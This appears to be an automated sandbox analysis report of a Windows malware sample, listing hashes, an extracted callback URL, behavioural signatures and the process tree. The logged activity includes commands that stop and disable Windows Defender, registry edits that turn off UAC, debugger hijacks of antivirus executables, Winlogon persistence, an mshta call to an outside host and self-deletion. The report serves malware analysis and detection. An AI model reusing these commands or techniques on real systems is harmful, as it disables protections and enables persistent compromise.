Analysis
-
max time kernel
152s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
05-12-2022 12:39
Static task
static1
Behavioral task
behavioral1
Sample
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource
win10v2004-20221111-en
General
-
Target
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
-
Size
2.2MB
-
MD5
44e75fcf7bffbb2d15574bd78abb663b
-
SHA1
43be4f349f05f5ba056961ee8bdc9e4e8c443a10
-
SHA256
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
-
SHA512
c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
-
SSDEEP
49152:Tb+qOGFGc/y+BMsAuII26f0EQh6fVnOTk3DSpX4R9DKp52:Tb2ou+mZpI268EQsx3D2XNpw
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=VUIIVLGQ&2=i-s&3=135&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\wrvfvp.exe" wrvfvp.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wrvfvp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wrvfvp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" wrvfvp.exe -
Executes dropped EXE 1 IoCs
pid Process 1096 wrvfvp.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe \Debugger = "svchost.exe" wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" wrvfvp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe wrvfvp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" wrvfvp.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1556 cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wrvfvp.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 520 sc.exe 1552 sc.exe 912 sc.exe 528 sc.exe 2036 sc.exe 1524 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1096 wrvfvp.exe Token: SeShutdownPrivilege 1096 wrvfvp.exe Token: SeDebugPrivilege 1096 wrvfvp.exe Token: SeShutdownPrivilege 1096 wrvfvp.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe 1096 wrvfvp.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1244 wrote to memory of 2036 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 28 PID 1244 wrote to memory of 2036 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 28 PID 1244 wrote to memory of 2036 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 28 PID 1244 wrote to memory of 2036 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 28 PID 1244 wrote to memory of 1524 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 29 PID 1244 wrote to memory of 1524 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 29 PID 1244 wrote to memory of 1524 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 29 PID 1244 wrote to memory of 1524 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 29 PID 1244 wrote to memory of 568 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 32 PID 1244 wrote to memory of 568 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 32 PID 1244 wrote to memory of 568 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 32 PID 1244 wrote to memory of 568 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 32 PID 1244 wrote to memory of 520 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 33 PID 1244 wrote to memory of 520 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 33 PID 1244 wrote to memory of 520 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 33 PID 1244 wrote to memory of 520 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 33 PID 568 wrote to memory of 1948 568 net.exe 36 PID 568 wrote to memory of 1948 568 net.exe 36 PID 568 wrote to memory of 1948 568 net.exe 36 PID 568 wrote to memory of 1948 568 net.exe 36 PID 1244 wrote to memory of 1096 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 37 PID 1244 wrote to memory of 1096 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 37 PID 1244 wrote to memory of 1096 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 37 PID 1244 wrote to memory of 1096 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 37 PID 1244 wrote to memory of 1556 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 38 PID 1244 wrote to memory of 1556 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 38 PID 1244 wrote to memory of 1556 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 38 PID 1244 wrote to memory of 1556 1244 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 38 PID 1096 wrote to memory of 1552 1096 wrvfvp.exe 40 PID 1096 wrote to memory of 1552 1096 wrvfvp.exe 40 PID 1096 wrote to memory of 1552 1096 wrvfvp.exe 40 PID 1096 wrote to memory of 1552 1096 wrvfvp.exe 40 PID 1096 wrote to memory of 912 1096 wrvfvp.exe 43 PID 1096 wrote to memory of 912 1096 wrvfvp.exe 43 PID 1096 wrote to memory of 912 1096 wrvfvp.exe 43 PID 1096 wrote to memory of 912 1096 wrvfvp.exe 43 PID 1096 wrote to memory of 1564 1096 wrvfvp.exe 42 PID 1096 wrote to memory of 1564 1096 wrvfvp.exe 42 PID 1096 wrote to memory of 1564 1096 wrvfvp.exe 42 PID 1096 wrote to memory of 1564 1096 wrvfvp.exe 42 PID 1096 wrote to memory of 528 1096 wrvfvp.exe 45 PID 1096 wrote to memory of 528 1096 wrvfvp.exe 45 PID 1096 wrote to memory of 528 1096 wrvfvp.exe 45 PID 1096 wrote to memory of 528 1096 wrvfvp.exe 45 PID 1564 wrote to memory of 972 1564 net.exe 48 PID 1564 wrote to memory of 972 1564 net.exe 48 PID 1564 wrote to memory of 972 1564 net.exe 48 PID 1564 wrote to memory of 972 1564 net.exe 48 PID 1096 wrote to memory of 1388 1096 wrvfvp.exe 49 PID 1096 wrote to memory of 1388 1096 wrvfvp.exe 49 PID 1096 wrote to memory of 1388 1096 wrvfvp.exe 49 PID 1096 wrote to memory of 1388 1096 wrvfvp.exe 49 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System wrvfvp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wrvfvp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wrvfvp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" wrvfvp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:520
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\wrvfvp.exeC:\Users\Admin\AppData\Roaming\Microsoft\wrvfvp.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1096 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:972
-
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:912
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:528
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=VUIIVLGQ&2=i-s&3=135&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Modifies Internet Explorer settings
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\900FFC~1.EXE" >> NUL2⤵
- Deletes itself
PID:1556
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD544e75fcf7bffbb2d15574bd78abb663b
SHA143be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
-
Filesize
2.2MB
MD544e75fcf7bffbb2d15574bd78abb663b
SHA143be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
-
Filesize
2.2MB
MD544e75fcf7bffbb2d15574bd78abb663b
SHA143be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961